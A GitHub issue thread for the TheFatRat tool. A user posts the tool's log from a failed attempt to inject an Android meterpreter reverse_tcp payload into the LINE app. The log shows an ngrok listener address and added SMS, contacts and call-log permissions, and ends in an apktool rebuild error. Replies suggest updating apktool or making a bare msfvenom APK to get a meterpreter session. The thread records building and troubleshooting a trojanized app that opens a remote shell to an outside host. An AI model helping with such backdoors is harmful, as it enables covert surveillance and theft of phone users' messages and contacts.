### ISSUE TITLE
Exception in thread "main" brut.androlib.AndrolibException: brut.androlib.AndrolibException: brut.common.BrutException: could not exec

### ISSUE THREAD

**Issue by blackjack417** [Screetsec/TheFatRat#183]
Generate Backdoor
  +------------++-------------------------++-----------------------+
  | Name       ||  Descript   	          || Your Input
  +------------++-------------------------++-----------------------+
  | LHOST      ||  The Listen Addres      || 0.tcp.ngrok.io
  | LPORT      ||  The Listen Ports       || 10249
  | OUTPUTNAME ||  The Filename output    || app_backdoored.apk
  | PAYLOAD    ||  Payload To Be Used     || android/meterpreter/reverse_tcp
  +------------++-------------------------++-----------------------+

 
[*] Creating RAT payload with msfvenom
[✔] Done!
[*] Creating a Valid Certificate
[✔] Done!
[*] Starting the merging process of RAT with the APK you selected
 
[*] Signing payload..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating onCreate() hook..
[*] Copying payload files..
[*] Loading temp/original/smali/jp/naver/line/android/activity/SplashActivity.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding android.permission.SEND_SMS
[*] Adding android.permission.WRITE_CONTACTS
[*] Adding android.permission.READ_SMS
[*] Adding android.permission.RECEIVE_BOOT_COMPLETED
[*] Adding android.permission.SET_WALLPAPER
[*] Adding android.permission.READ_CALL_LOG
[*] Adding android.permission.WRITE_CALL_LOG
[*] Rebuilding /root/Desktop/TheFatRat/temp/app.apk with meterpreter injection as /root/Desktop/TheFatRat/temp/app_backdoored.apk..
W: warning: string 'app_package_status_in_review_under_processing' has no default translation.
W: /root/Desktop/TheFatRat/temp/original/res/layout-v26/abc_screen_toolbar.xml:5: error: No resource identifier found for attribute 'keyboardNavigationCluster' in package 'android'
W: 
Exception in thread "main" brut.androlib.AndrolibException: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_670329087213206181.tmp, p, --forced-package-id, 127, --min-sdk-version, 16, --target-sdk-version, 23, --version-code, 16071102, --version-name, 7.11.2, --no-version-vectors, -F, /tmp/APKTOOL8046183106946566936.tmp, -0, arsc, -0, js, -0, dat, -0, bin, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /root/Desktop/TheFatRat/temp/original/res, -M, /root/Desktop/TheFatRat/temp/original/AndroidManifest.xml]
	at brut.androlib.Androlib.buildResourcesFull(Androlib.java:477)
	at brut.androlib.Androlib.buildResources(Androlib.java:411)
	at brut.androlib.Androlib.build(Androlib.java:310)
	at brut.androlib.Androlib.build(Androlib.java:263)
	at brut.apktool.Main.cmdBuild(Main.java:227)
	at brut.apktool.Main.main(Main.java:84)
Caused by: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_670329087213206181.tmp, p, --forced-package-id, 127, --min-sdk-version, 16, --target-sdk-version, 23, --version-code, 16071102, --version-name, 7.11.2, --no-version-vectors, -F, /tmp/APKTOOL8046183106946566936.tmp, -0, arsc, -0, js, -0, dat, -0, bin, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /root/Desktop/TheFatRat/temp/original/res, -M, /root/Desktop/TheFatRat/temp/original/AndroidManifest.xml]
	at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:440)
	at brut.androlib.Androlib.buildResourcesFull(Androlib.java:463)
	... 5 more
Caused by: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_670329087213206181.tmp, p, --forced-package-id, 127, --min-sdk-version, 16, --target-sdk-version, 23, --version-code, 16071102, --version-name, 7.11.2, --no-version-vectors, -F, /tmp/APKTOOL8046183106946566936.tmp, -0, arsc, -0, js, -0, dat, -0, bin, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /root/Desktop/TheFatRat/temp/original/res, -M, /root/Desktop/TheFatRat/temp/original/AndroidManifest.xml]
	at brut.util.OS.exec(OS.java:95)
	at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:434)
	... 6 more
[+] Infected file /root/Desktop/TheFatRat/temp/app_backdoored.apk ready.
 
\e[1;31m 
[x] There was an error in the creation of your RAT APK file , the possible reasons are :
- The architecture of the file is not for android
- The original APK is protected
- It was not possible to inject the payload in the hook you selected (in this case select a different hook point)
Check log file at : /root/Desktop/TheFatRat/logs/apk-old.log

pjease give a solution

**Comment by peterpt** [comment]
It seems that error is related to your apk code , that apk must be recent .
We did not build the script to create backdoor apk .
You could try with old method apk in fatrat and choose an hook point to see if you get any luck .
In alternative , if it is just for testing then create only the apk payload for android in msfvenom menu  , that will create only the apk payload which you can install it in an android device and get a meterpreter in metasploit framework .

**Comment by Nisthar** [comment]
@JadeAldemir Update apktool. its a bug in apktool.

**Comment by ouihamdaoui** [comment]
Log For : app.apk 

 Log Type : Recompiling 

 Log Recorded At : 12 2018-01- 2:22:58,11 

 Log Recorded By : Advanced ApkTool v4.2.0 By BDFreak 

------------------------------------------------------ 

W: C:\Users\pc\Desktop\AdvancedApkTool\3-Out\app.apk\AndroidManifest.xml:16: error: No resource identifier found for attribute 'roundIcon' in package 'android'
W: 
Exception in thread "main" brut.androlib.AndrolibException: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [C:\Users\pc\AppData\Local\Temp\brut_util_Jar_1479779000625798190.tmp, p, --forced-package-id, 127, --min-sdk-version, 15, --target-sdk-version, 26, --version-code, 10, --version-name, 10.0, --no-version-vectors, -F, C:\Users\pc\AppData\Local\Temp\APKTOOL5360200212280990529.tmp, -0, arsc, -0, arsc, -I, C:\Users\pc\Desktop\AdvancedApkTool\1-BDFreak\Frameworks\1.apk, -S, C:\Users\pc\Desktop\AdvancedApkTool\3-Out\app.apk\res, -M, C:\Users\pc\Desktop\AdvancedApkTool\3-Out\app.apk\AndroidManifest.xml]
	at brut.androlib.Androlib.buildResourcesFull(Androlib.java:492)
	at brut.androlib.Androlib.buildResources(Androlib.java:426)
	at brut.androlib.Androlib.build(Androlib.java:305)
	at brut.androlib.Androlib.build(Androlib.java:270)
	at brut.apktool.Main.cmdBuild(Main.java:227)
	at brut.apktool.Main.main(Main.java:75)
Caused by: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [C:\Users\pc\AppData\Local\Temp\brut_util_Jar_1479779000625798190.tmp, p, --forced-package-id, 127, --min-sdk-version, 15, --target-sdk-version, 26, --version-code, 10, --version-name, 10.0, --no-version-vectors, -F, C:\Users\pc\AppData\Local\Temp\APKTOOL5360200212280990529.tmp, -0, arsc, -0, arsc, -I, C:\Users\pc\Desktop\AdvancedApkTool\1-BDFreak\Frameworks\1.apk, -S, C:\Users\pc\Desktop\AdvancedApkTool\3-Out\app.apk\res, -M, C:\Users\pc\Desktop\AdvancedApkTool\3-Out\app.apk\AndroidManifest.xml]
	at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:456)
	at brut.androlib.Androlib.buildResourcesFull(Androlib.java:478)
	... 5 more
Caused by: brut.common.BrutException: could not exec (exit code = 1): [C:\Users\pc\AppData\Local\Temp\brut_util_Jar_1479779000625798190.tmp, p, --forced-package-id, 127, --min-sdk-version, 15, --target-sdk-version, 26, --version-code, 10, --version-name, 10.0, --no-version-vectors, -F, C:\Users\pc\AppData\Local\Temp\APKTOOL5360200212280990529.tmp, -0, arsc, -0, arsc, -I, C:\Users\pc\Desktop\AdvancedApkTool\1-BDFreak\Frameworks\1.apk, -S, C:\Users\pc\Desktop\AdvancedApkTool\3-Out\app.apk\res, -M, C:\Users\pc\Desktop\AdvancedApkTool\3-Out\app.apk\AndroidManifest.xml]
	at brut.util.OS.exec(OS.java:95)
	at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:450)
	... 6 more

**Comment by Screetsec** [comment]
https://github.com/Screetsec/TheFatRat/blob/master/issues.md
